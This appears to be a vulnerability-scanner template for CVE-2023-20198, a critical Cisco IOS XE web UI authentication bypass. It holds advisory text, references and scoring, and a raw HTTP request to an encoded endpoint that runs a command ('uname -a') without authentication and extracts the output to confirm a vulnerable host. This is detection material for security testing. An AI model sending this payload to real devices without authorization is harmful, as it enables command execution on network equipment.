id: CVE-2023-20198 info: name: Cisco IOS XE - Authentication Bypass author: iamnoooob,rootxharsh,pdresearch severity: critical description: | Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory. Cisco will provide updates on the status of this investigation and when a software patch is available. impact: | The CVE-2023-20198 vulnerability has a high impact on the system, allowing remote attackers to execute arbitrary code or cause a denial of service. remediation: | Apply the latest security patches or updates provided by the vendor to fix the CVE-2023-20198 vulnerability. reference: - https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/ - https://arstechnica.com/security/2023/10/actively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control/ - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z - https://www.cisa.gov/guidance-addressing-cisco-ios-xe-web-ui-vulnerabilities - https://www.darkreading.com/vulnerabilities-threats/critical-unpatched-cisco-zero-day-bug-active-exploit classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2023-20198 epss-score: 0.89074 epss-percentile: 0.98434 cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cisco product: ios_xe shodan-query: http.html_hash:1076109428 note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution. tags: cve,cve2023,kev,cisco,rce,auth-bypass variables: cmd: uname -a http: - raw: - |- POST /%2577eb%2575i_%2577sma_Http HTTP/1.1 Host: {{Hostname}} admin***** {{cmd}} matchers: - type: regex part: body regex: - XMLSchema - execLog - Cisco Systems - - condition: and extractors: - type: regex part: body group: 1 regex: - \n(.*)\[ # digest: 4b0a00483046022100e9f5588343376a7fe8d1afee9bee342f5d6f14b054bb48120a0983d19cc9e75b022100b7250eef78b6aefa4226d087c21c0be95d6850fe747d0d87b59a27b2a2917100:922c64590222798bb761d5b6d8e72950